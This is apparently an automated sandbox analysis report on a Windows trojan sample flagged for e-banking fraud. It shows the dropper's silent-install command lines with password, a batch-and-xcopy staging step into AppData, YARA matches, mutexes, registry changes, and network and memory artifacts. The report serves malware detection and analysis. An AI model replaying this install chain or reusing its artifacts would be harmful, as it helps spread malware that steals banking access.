                          Source: ast.exe, 0000000A.00000002.3344815019.0000000003064000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aid003
                          Source: ast.exe, 0000000A.00000003.3124114421.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141994540.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aihY
                          Source: ast.exe, 0000000A.00000002.3344815019.0000000003032000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aii
                          Source: ast.exe, 0000000A.00000003.2783362504.0000000000E10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aij
                          Source: ast.exe, 0000000A.00000002.3344406161.000000000116C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1aiv
                          Source: ast.exe, 0000000A.00000003.3318115880.0000000005D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0ar
                          Source: xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drString found in binary or memory: https://sectigo.com/CPS0
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0B
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455052025.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0C
                          Source: xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455052025.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drString found in binary or memory: https://sectigo.com/CPS0D
                          Source: ast.exe, 0000000A.00000003.2783003987.0000000005D56000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2783003987.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3029895127.0000000005D5D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2953188361.0000000005D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0D
                          Source: xcopy.exe, 00000008.00000003.2454146070.00000000030A9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2447777452.00000000032A2000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3368385814.000000006BBD2000.00000002.00000001.01000000.00000012.sdmp, ast.exe, 0000000A.00000002.3374557553.000000006BE40000.00000002.00000001.01000000.00000013.sdmp, is-E6DJ2.tmp.4.drString found in binary or memory: https://www.openssl.org/H
                          Source: xcopy.exe, 00000008.00000003.2449507358.0000000003272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/docs/faq.html
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50163
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                          Source: Yara match File source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: Process Memory Space: ast.exe PID: 3380, type: MEMORYSTR
                          Source: Yara match File source: C:\Users\user\AppData\Roaming\template\ast.exe, type: DROPPED
                          Source: Yara match File source: C:\Users\user\AppData\Local\Temp\u7i3kw\is-TBGHD.tmp, type: DROPPED

                          E-Banking Fraud

                          Source: Yara match File source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: ast.exe PID: 3380, type: MEMORYSTR
                          Source: Yara match File source: C:\Users\user\AppData\Roaming\template\ast.exe, type: DROPPED
                          Source: Yara match File source: C:\Users\user\AppData\Local\Temp\u7i3kw\is-TBGHD.tmp, type: DROPPED
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Code function: 10_2_6B778010 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Code function: String function: 6B7A06B0 appears 83 times
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Code function: String function: 6B7A05D0 appears 122 times
                          Source: aeyh21MAtA.exe Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: aeyh21MAtA.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                          Source: aeyh21MAtA.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                          Source: aeyh21MAtA.tmp.3.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                          Source: aeyh21MAtA.tmp.3.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                          Source: aeyh21MAtA.exe, 00000000.00000003.2076256080.0000000002553000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs aeyh21MAtA.exe
                          Source: aeyh21MAtA.exe, 00000000.00000003.2076621419.000000007FE3F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs aeyh21MAtA.exe
                          Source: aeyh21MAtA.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                          Source: classification engine Classification label: mal88.troj.evad.winEXE@16/65@2/2
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Code function: 11_3_070013E5 CreateToolhelp32Snapshot,Process32First,Process32Next,Sleep
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\npr01lnkwrNDE3088FE-2234-4D4D-9206-D65E12CF2A75
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\npr01lnkslNDE3088FE-2234-4D4D-9206-D65E12CF2A75
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Mutant created: \Sessions\1\BaseNamedObjects\NULL
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Mutant created: \Sessions\1\BaseNamedObjects\3 @
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\02CC837A-11F4-4C58-AE40-A04E18FF470DE1
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Mutant created: \Sessions\1\BaseNamedObjects\U SVW3 E E E
                          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exe File created: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp
                          Source: Yara match File source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara match File source: C:\Users\user\AppData\Roaming\template\ast.exe, type: DROPPED
                          Source: Yara match File source: C:\Users\user\AppData\Local\Temp\u7i3kw\is-TBGHD.tmp, type: DROPPED
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\u7i3kw\9vsl3c.bat""
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp File read: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710614157.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                          Source: aeyh21MAtA.exe ReversingLabs: Detection: 36%
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exe File read: C:\Users\user\Desktop\aeyh21MAtA.exe
                          Source: unknown Process created: C:\Users\user\Desktop\aeyh21MAtA.exe "C:\Users\user\Desktop\aeyh21MAtA.exe"
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exe Process created: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp "C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp" /SL5="$20454,6701859,404480,C:\Users\user\Desktop\aeyh21MAtA.exe"
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp Process created: C:\Users\user\Desktop\aeyh21MAtA.exe "C:\Users\user\Desktop\aeyh21MAtA.exe" /verysilent /password=lzueuxc
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exe Process created: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp "C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp" /SL5="$20464,6701859,404480,C:\Users\user\Desktop\aeyh21MAtA.exe" /verysilent /password=lzueuxc
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\u7i3kw\9vsl3c.bat""
                          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\u7i3kw\*" "C:\Users\user\AppData\Roaming\template\"
                          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\template\ast.exe "C:\Users\user\AppData\Roaming\template\ast.exe"
                          Source: unknown Process created: C:\Users\user\AppData\Roaming\template\ast.exe "C:\Users\user\AppData\Roaming\template\ast.exe"
                          Source: unknown Process created: C:\Users\user\AppData\Roaming\template\ast.exe "C:\Users\user\AppData\Roaming\template\ast.exe"
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp; Sections loaded: msimg32.dll, version.dll, mpr.dll, uxtheme.dll, kernel.appcore.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, shfolder.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, windows.storage.dll, wldp.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp; Sections loaded: msimg32.dll, version.dll, mpr.dll, uxtheme.dll, kernel.appcore.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, shfolder.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, windows.storage.dll, wldp.dll, textshaping.dll, sspicli.dll, dwmapi.dll, sfc.dll, sfc_os.dll, explorerframe.dll
                          Source: C:\Windows\SysWOW64\cmd.exe; Sections loaded: cmdext.dll, apphelp.dll
                          Source: C:\Windows\SysWOW64\xcopy.exe; Sections loaded: ulib.dll, ifsutil.dll, devobj.dll, fsutilext.dll, ntmarta.dll
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe; Sections loaded: version.dll, mpr.dll, olepro32.dll, wininet.dll, wsock32.dll, wtsapi32.dll, winmm.dll, netapi32.dll, shfolder.dll, userenv.dll, sqlite3.dll, iphlpapi.dll, crtdll.dll, msacm32.dll, quartz.dll, msvfw32.dll, avifil32.dll, winmmbase.dll, wkscli.dll, logoncli.dll, netutils.dll, samcli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, winhttp.dll, sspicli.dll, uxtheme.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll, colorui.dll, mscms.dll, coloradapterclient.dll, compstui.dll, msimg32.dll, inetres.dll, windowscodecs.dll, propsys.dll, profapi.dll, dwmapi.dll, security.dll, secur32.dll, winsta.dll, scrrun.dll, sxs.dll, dbghelp.dll, dbgcore.dll, cscapi.dll, d3d11.dll, dxgi.dll, astcrp.dll, libssl-1_1.dll, libcrypto-1_1.dll, vcruntime140.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll, amsi.dll, textshaping.dll, powrprof.dll, umpdc.dll, dataexchange.dll, dcomp.dll, twinapi.appcore.dll, iertutil.dll, ondemandconnroutehelper.dll, winnsi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                          Source: C:\Windows\SysWOW64\xcopy.exe File written: C:\Users\user\AppData\Roaming\template\config.ini
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Window found: window name: TMainForm
                          Source: Window Recorder Window detected: More than 3 window changes detected
                          Source: aeyh21MAtA.exe Static file information: File size 7234714 > 1048576
                          Source: Binary string: vcruntime140.i386.pdb source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710833061.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3384892485.000000006CC81000.00000020.00000001.01000000.00000014.sdmp
                          Source: Binary string: vcruntime140.i386.pdbGCTL source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710833061.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3384892485.000000006CC81000.00000020.00000001.01000000.00000014.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libcrypto-1_1.pdb source: xcopy.exe, 00000008.00000003.2447777452.000000000325D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3372819038.000000006BE10000.00000002.00000001.01000000.00000013.sdmp, is-E6DJ2.tmp.4.dr
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\libjpeg-turbo-win.pdb! source: xcopy.exe, 00000008.00000003.2453881956.00000000030AD000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: vcomp140.i386.pdbGCTL source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710762218.0000000003089000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: msvcr120.i386.pdb source: xcopy.exe, 00000008.00000003.2454654792.0000000003089000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\CFILES\Projects\WinSSL\openssl-1.1.0g\libcrypto-1_1.pdb source: xcopy.exe, 00000008.00000003.2449507358.0000000003272000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdbe source: ast.exe, 0000000A.00000002.3386730194.000000006CEF3000.00000002.00000001.01000000.0000000E.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb@W source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdb source: xcopy.exe, 00000008.00000003.2446543838.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3377655988.000000006C1AF000.00000002.00000001.01000000.00000010.sdmp, is-SNDPS.tmp.4.dr
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdb source: xcopy.exe, 00000008.00000003.2446944142.0000000003273000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3383625621.000000006C462000.00000002.00000001.01000000.0000000F.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\libjpeg-turbo-win.pdb source: xcopy.exe, 00000008.00000003.2453881956.00000000030AD000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb@@ source: xcopy.exe, 00000008.00000003.2454146070.00000000030A9000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3368070607.000000006BBB1000.00000002.00000001.01000000.00000012.sdmp
                          Source: Binary string: vcomp140.i386.pdb source: aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710762218.0000000003089000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdbf source: xcopy.exe, 00000008.00000003.2446944142.0000000003273000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3383625621.000000006C462000.00000002.00000001.01000000.0000000F.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb source: xcopy.exe, 00000008.00000003.2454146070.00000000030A9000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3368070607.000000006BBB1000.00000002.00000001.01000000.00000012.sdmp
                          Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: ast.exe, 0000000A.00000002.3372819038.000000006BDA7000.00000002.00000001.01000000.00000013.sdmp, is-E6DJ2.tmp.4.dr
